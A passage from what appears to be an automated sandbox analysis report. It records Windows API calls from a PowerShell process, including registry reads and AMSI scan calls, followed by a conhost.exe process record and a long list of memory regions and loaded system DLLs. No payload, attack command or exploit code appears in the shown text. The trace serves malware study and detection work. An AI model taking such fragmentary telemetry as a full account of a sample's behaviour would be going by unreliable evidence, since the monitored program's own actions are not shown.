lpBuffer="") returned 0x0 [0191.770] CoTaskMemFree (pv=0x1a9f8410) [0191.770] EtwEventActivityIdControl () returned 0x0 [0191.770] EtwEventActivityIdControl () returned 0x0 [0191.770] EtwEventActivityIdControl () returned 0x0 [0191.771] EtwEventActivityIdControl () returned 0x0 [0191.771] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f5330 [0191.771] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f5330, nSize=0x105 | out: lpBuffer="") returned 0x0 [0191.771] CoTaskMemFree (pv=0x1a9f5330) [0191.771] EtwEventActivityIdControl () returned 0x0 [0191.771] EtwEventActivityIdControl () returned 0x0 [0191.771] EtwEventActivityIdControl () returned 0x0 [0191.808] EtwEventActivityIdControl () returned 0x0 [0191.808] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f4230 [0191.808] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f4230, nSize=0x105 | out: lpBuffer="") returned 0x0 [0191.808] CoTaskMemFree (pv=0x1a9f4230) [0191.808] EtwEventActivityIdControl () returned 0x0 [0191.808] EtwEventActivityIdControl () returned 0x0 [0191.808] EtwEventActivityIdControl () returned 0x0 [0191.809] EtwEventActivityIdControl () returned 0x0 [0191.809] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f1bf0 [0191.809] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f1bf0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0191.809] CoTaskMemFree (pv=0x1a9f1bf0) [0191.809] EtwEventActivityIdControl () returned 0x0 [0191.809] EtwEventActivityIdControl () returned 0x0 [0191.809] EtwEventActivityIdControl () returned 0x0 [0191.809] EtwEventActivityIdControl () returned 0x0 [0191.914] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de0c8 | out: phkResult=0x1b7de0c8*=0x688) returned 0x0 [0191.914] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x0, lpcbData=0x1b7de110*=0x0 | out: lpType=0x1b7de118*=0x1, lpData=0x0, lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.915] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x24a1fe8, lpcbData=0x1b7de110*=0x56 | out: lpType=0x1b7de118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.915] RegCloseKey (hKey=0x688) returned 0x0 [0191.915] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de0c8 | out: phkResult=0x1b7de0c8*=0x688) returned 0x0 [0191.915] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x0, lpcbData=0x1b7de110*=0x0 | out: lpType=0x1b7de118*=0x1, lpData=0x0, lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.915] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x24a2390, lpcbData=0x1b7de110*=0x56 | out: lpType=0x1b7de118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.915] RegCloseKey (hKey=0x688) returned 0x0 [0191.915] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de0c8 | out: phkResult=0x1b7de0c8*=0x688) returned 0x0 [0191.915] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x0, lpcbData=0x1b7de110*=0x0 | out: lpType=0x1b7de118*=0x1, lpData=0x0, lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.915] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x24a2710, lpcbData=0x1b7de110*=0x56 | out: lpType=0x1b7de118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.915] RegCloseKey (hKey=0x688) returned 0x0 [0191.916] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de0c8 | out: phkResult=0x1b7de0c8*=0x688) returned 0x0 [0191.916] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x0, lpcbData=0x1b7de110*=0x0 | out: lpType=0x1b7de118*=0x1, lpData=0x0, lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.916] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x24a2aa8, lpcbData=0x1b7de110*=0x56 | out: lpType=0x1b7de118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.916] RegCloseKey (hKey=0x688) returned 0x0 [0191.916] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de0c8 | out: phkResult=0x1b7de0c8*=0x688) returned 0x0 [0191.916] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x0, lpcbData=0x1b7de110*=0x0 | out: lpType=0x1b7de118*=0x1, lpData=0x0, lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.916] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x24a2e50, lpcbData=0x1b7de110*=0x56 | out: lpType=0x1b7de118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.916] RegCloseKey (hKey=0x688) returned 0x0 [0191.916] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de0c8 | out: phkResult=0x1b7de0c8*=0x688) returned 0x0 [0191.916] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x0, lpcbData=0x1b7de110*=0x0 | out: lpType=0x1b7de118*=0x1, lpData=0x0, lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.916] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x24a31f8, lpcbData=0x1b7de110*=0x56 | out: lpType=0x1b7de118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.916] RegCloseKey (hKey=0x688) returned 0x0 [0191.917] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7de0c8 | out: phkResult=0x1b7de0c8*=0x688) returned 0x0 [0191.917] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x0, lpcbData=0x1b7de110*=0x0 | out: lpType=0x1b7de118*=0x1, lpData=0x0, lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.917] RegQueryValueExW (in: hKey=0x688, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7de118, lpData=0x24a3578, lpcbData=0x1b7de110*=0x56 | out: lpType=0x1b7de118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7de110*=0x56) returned 0x0 [0191.917] RegCloseKey (hKey=0x688) returned 0x0 [0191.917] EtwEventActivityIdControl () returned 0x0 [0191.917] EtwEventActivityIdControl () returned 0x0 [0191.917] SetEvent (hEvent=0x6f8) returned 1 [0191.918] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7de4e0*=0x6f8, lpdwindex=0x1b7de2b4 | out: lpdwindex=0x1b7de2b4) returned 0x0 [0191.919] CoTaskMemAlloc (cb=0x20e) returned 0x1a9f6a90 [0191.919] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a9f6a90, nSize=0x105 | out: lpBuffer="") returned 0x0 [0191.919] CoTaskMemFree (pv=0x1a9f6a90) [0191.921] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0191.921] GetFileType (hFile=0x28) returned 0x2 [0191.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x1b7de818 | out: lpConsoleScreenBufferInfo=0x1b7de818) returned 1 [0192.010] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x1b7de818 | out: lpConsoleScreenBufferInfo=0x1b7de818) returned 1 [0192.150] EtwEventActivityIdControl () returned 0x0 [0192.150] EtwEventActivityIdControl () returned 0x0 [0192.150] EtwEventActivityIdControl () returned 0x0 [0192.298] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x688 [0192.299] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x1388, cHandles=0x1, pHandles=0x1b7de940*=0x688, lpdwindex=0x1b7de714 | out: lpdwindex=0x1b7de714) returned 0x80010115 [0197.309] EtwEventActivityIdControl () returned 0x0 [0197.337] CloseHandle (hObject=0x688) returned 1 [0197.339] EtwEventActivityIdControl () returned 0x0 [0197.339] EtwEventActivityIdControl () returned 0x0 [0197.339] EtwEventActivityIdControl () returned 0x0 [0197.339] EtwEventActivityIdControl () returned 0x0 [0197.343] SetEvent (hEvent=0x568) returned 1 [0197.343] SetEvent (hEvent=0x590) returned 1 [0197.343] SetEvent (hEvent=0x58c) returned 1 [0197.343] SetEvent (hEvent=0x570) returned 1 [0197.343] SetEvent (hEvent=0x598) returned 1 [0197.343] SetEvent (hEvent=0x594) returned 1 [0197.343] SetEvent (hEvent=0x57c) returned 1 [0197.343] SetEvent (hEvent=0x578) returned 1 [0197.343] SetEvent (hEvent=0x584) returned 1 [0197.343] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7df250*=0x574, lpdwindex=0x1b7df024 | out: lpdwindex=0x1b7df024) returned 0x0 [0197.348] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.429] CoCreateGuid (in: pguid=0x1b7df0f8 | out: pguid=0x1b7df0f8*(Data1=0xead7e99b, Data2=0x17be, Data3=0x4ce7, Data4=([0]=0x94, [1]=0x9a, [2]=0xe7, [3]=0xd0, [4]=0x91, [5]=0x1e, [6]=0x10, [7]=0xe9))) returned 0x0 [0197.430] AmsiOpenSession () returned 0x0 [0197.430] AmsiScanString () returned 0x80070015 [0197.456] EtwEventActivityIdControl () returned 0x0 [0197.456] EtwEventActivityIdControl () returned 0x0 [0197.456] EtwEventActivityIdControl () returned 0x0 [0197.747] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x1b7de8a0*=0x700, lpdwindex=0x1b7de694 | out: lpdwindex=0x1b7de694) returned 0x0 [0197.747] SetEvent (hEvent=0x6e8) returned 1 [0197.747] SetEvent (hEvent=0x700) returned 1 [0197.747] EtwEventActivityIdControl () returned 0x0 [0197.748] SetEvent (hEvent=0x6d4) returned 1 [0197.748] SetEvent (hEvent=0x6e8) returned 1 [0197.748] SetEvent (hEvent=0x700) returned 1 [0197.748] SetEvent (hEvent=0x6d8) returned 1 [0197.748] SetEvent (hEvent=0x69c) returned 1 [0197.748] SetEvent (hEvent=0x704) returned 1 [0197.748] SetEvent (hEvent=0x698) returned 1 [0197.748] SetEvent (hEvent=0x68c) returned 1 [0197.758] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7df250*=0x574, lpdwindex=0x1b7df024 | out: lpdwindex=0x1b7df024) returned 0x0 [0197.938] CoGetContextToken (in: pToken=0x1b7dfb00 | out: pToken=0x1b7dfb00) returned 0x0 [0197.939] CoUninitialize () [0197.969] GenericStreamBase::Read () returned 0x0 [0197.969] GenericStreamBase::Read () returned 0x0 [0197.969] GenericStreamBase::Read () returned 0x0 Thread: id = 209 os_tid = 0x1c8 Thread: id = 210 os_tid = 0x74c Thread: id = 211 os_tid = 0x2fc Thread: id = 212 os_tid = 0xb70 [0175.821] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0175.822] CoGetContextToken (in: pToken=0x1bb3fac0 | out: pToken=0x1bb3fac0) returned 0x0 [0175.822] CObjectContext::QueryInterface () returned 0x0 [0175.822] CObjectContext::GetCurrentThreadType () returned 0x0 [0175.822] Release () returned 0x0 [0175.822] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0175.822] CoUninitialize () [0175.822] RoInitialize () returned 0x1 [0175.822] RoUninitialize () returned 0x0 Thread: id = 213 os_tid = 0x9fc Thread: id = 214 os_tid = 0x3c8 Thread: id = 215 os_tid = 0xa88 [0182.973] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0182.974] CoGetContextToken (in: pToken=0x1bc3fa40 | out: pToken=0x1bc3fa40) returned 0x0 [0182.974] CObjectContext::QueryInterface () returned 0x0 [0182.974] CObjectContext::GetCurrentThreadType () returned 0x0 [0182.974] Release () returned 0x0 [0182.974] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0182.974] CoUninitialize () [0182.974] RoInitialize () returned 0x1 [0182.974] RoUninitialize () returned 0x0 Thread: id = 216 os_tid = 0x87c Thread: id = 217 os_tid = 0x2d8 Thread: id = 224 os_tid = 0x504 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x51b7a000" os_pid = "0x79c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xdd8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2601 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2602 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2603 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2604 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2605 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2606 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2607 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2608 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2609 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2610 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2611 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2612 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2613 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2614 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2615 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2616 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2617 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2618 start_va = 0x400000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2619 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2620 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2621 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2622 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2623 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2624 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2625 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2626 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2627 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2628 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2629 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2630 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2631 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2632 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2639 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2640 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2641 start_va = 0x640000 end_va = 0x7c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2642 start_va = 0x7d0000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2643 start_va = 0x960000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2644 start_va = 0x1d60000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 2645 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2646 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2647 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2648 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2649 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2650 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2651 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2652 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2653 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2654 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2655 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2656 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2657 start_va = 0x50000 end_va = 0x5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2659 start_va = 0x1f10000 end_va = 0x2246fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2660 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 2661 start_va = 0x1f00000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2662 start_va = 0x2250000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 2667 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2668 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2669 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2670 start_va = 0x2450000 end_va = 0x250bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 2671 start_va = 0x60000 end_va = 0x63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2672 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2673 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2674 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2675 start_va = 0x70000 end_va = 0x76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2676 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2677 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2678 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2679 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2680 start_va = 0x480000 end_va = 0x484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = 